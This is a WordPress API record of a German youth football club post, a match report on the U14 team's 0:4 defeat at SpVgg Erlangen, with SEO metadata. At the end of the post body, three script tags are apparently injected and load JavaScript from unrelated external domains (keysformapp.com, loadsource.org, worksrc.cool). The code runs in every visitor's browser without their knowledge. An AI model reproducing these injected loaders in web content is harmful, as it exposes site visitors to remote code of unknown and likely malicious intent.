{"id":6938,"date":"2018-11-11T22:49:50","date_gmt":"2018-11-11T21:49:50","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=6938"},"modified":"2018-11-11T22:49:50","modified_gmt":"2018-11-11T21:49:50","slug":"spvgg-erlangen-jfgw-40","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/","title":{"rendered":"SpVgg Erlangen &#8211; JFGW  4:0"},"content":{"rendered":"<p><strong>U14 der \u201eBlues\u201c bekommt kleine Lehrstunde<\/strong><\/p>\n<p><strong>Verdiente 0:4 Niederlage bei der SpVgg Erlangen<\/strong><\/p>\n<p>Am 9.Spieltag f\u00fchrte uns die Reise bereits zum dritten Mal nach Erlangen in dieser Saison, diesmal gastierten wir bei der SpVgg. Gegen einen k\u00f6rperlich klar \u00fcberlegenen Gegner brauchten wir f\u00fcnf Minuten um in das Spiel zu kommen. Dann aber konnten wir uns sogar ein kleines \u00dcbergewicht erspielen und kamen auch zu Torabschl\u00fcssen auf dem gro\u00dfen A-Platz in Erlangen. Allerdings mitten in diese Drangphase kassierten wir das 0:1. Nach einem Befreiungsschlag fehlte bei zwei Verteidigern die Absprache und somit freute sich der dritte. Der St\u00fcrmer der Spieli ging auf und davon und behielt dann noch den \u00dcberblick, legte quer auf den zweiten Pfosten wo ein weiterer Angreifer der Gastgeber nur noch den Fu\u00df hinhalten musste. In der Folge dann Nervosit\u00e4t im \u201eBlues\u201c Lager, viele leichte Fehler im Spielaufbau, ein schlechtes Anlaufen und eine zum Teil katastrophale Zweikampff\u00fchrung, so sah man die jungen Wendelsteiner noch nicht in dieser Saison. Auch in der zweiten H\u00e4lfte dasselbe Bild. Wendelstein stets bem\u00fcht, mit vielen kleinen Fehlern im Aufbau, die Heimmannschaft klar strukturiert mit hohem Tempo und guter Aggressivit\u00e4t, bestraften diese Fehler der \u201eBlues\u201c dann noch weitere dreimal zum Endstand. Eine auch in dieser H\u00f6he verdiente Niederlage gegen einen wahrlich guten Gegner an diesem Tag. Nun muss man sich kurz Sch\u00fctteln, die Woche gut trainieren und sich auf das wichtige Heimspiel kommende Woche gegen den TSV Altenberg vorbereiten, hier wird die Mannschaft auch wieder gefordert werden, auch hier sollte man den Gegner keinesfalls untersch\u00e4tzen, auch und vor allem wenn man den Abstand nach unten halten oder sogar vergr\u00f6\u00dfern m\u00f6chte.<\/p>\n<p>#GlaubeWilleLeidenschaft#weiterimmerweiter#OneTeam#WearetheBlues.<\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1541972956643\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worksrc.cool\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>U14 der \u201eBlues\u201c bekommt kleine Lehrstunde Verdiente 0:4 Niederlage bei der SpVgg Erlangen Am 9.Spieltag f\u00fchrte uns die Reise bereits zum dritten Mal nach Erlangen in dieser Saison, diesmal gastierten wir bei der SpVgg. Gegen einen k\u00f6rperlich klar \u00fcberlegenen Gegner brauchten wir f\u00fcnf Minuten um in das Spiel zu kommen. Dann aber konnten wir uns [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[2,16,18],"tags":[],"class_list":["post-6938","post","type-post","status-publish","format-standard","hentry","category-gf","category-spielbericht","category-u14"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"U14 der \u201eBlues\u201c bekommt kleine Lehrstunde Verdiente 0:4 Niederlage bei der SpVgg Erlangen Am 9.Spieltag f\u00fchrte uns die Reise bereits zum dritten Mal nach Erlangen in dieser Saison, diesmal gastierten wir bei der SpVgg. Gegen einen k\u00f6rperlich klar \u00fcberlegenen Gegner brauchten wir f\u00fcnf Minuten um in das Spiel zu kommen. Dann aber konnten wir uns [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2018-11-11T21:49:50+00:00\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"SpVgg Erlangen &#8211; JFGW 4:0\",\"datePublished\":\"2018-11-11T21:49:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/\"},\"wordCount\":288,\"articleSection\":[\"Gro\u00dffeld\",\"Spielbericht\",\"U14\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/\",\"name\":\"SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"datePublished\":\"2018-11-11T21:49:50+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/spvgg-erlangen-jfgw-40\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SpVgg Erlangen &#8211; JFGW 4:0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/","og_locale":"de_DE","og_type":"article","og_title":"SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein","og_description":"U14 der \u201eBlues\u201c bekommt kleine Lehrstunde Verdiente 0:4 Niederlage bei der SpVgg Erlangen Am 9.Spieltag f\u00fchrte uns die Reise bereits zum dritten Mal nach Erlangen in dieser Saison, diesmal gastierten wir bei der SpVgg. Gegen einen k\u00f6rperlich klar \u00fcberlegenen Gegner brauchten wir f\u00fcnf Minuten um in das Spiel zu kommen. Dann aber konnten wir uns [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/","og_site_name":"JFG Wendelstein","article_published_time":"2018-11-11T21:49:50+00:00","author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"SpVgg Erlangen &#8211; JFGW 4:0","datePublished":"2018-11-11T21:49:50+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/"},"wordCount":288,"articleSection":["Gro\u00dffeld","Spielbericht","U14"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/","name":"SpVgg Erlangen - JFGW 4:0 - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"datePublished":"2018-11-11T21:49:50+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/spvgg-erlangen-jfgw-40\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"SpVgg Erlangen &#8211; JFGW 4:0"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6938","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=6938"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6938\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=6938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=6938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=6938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}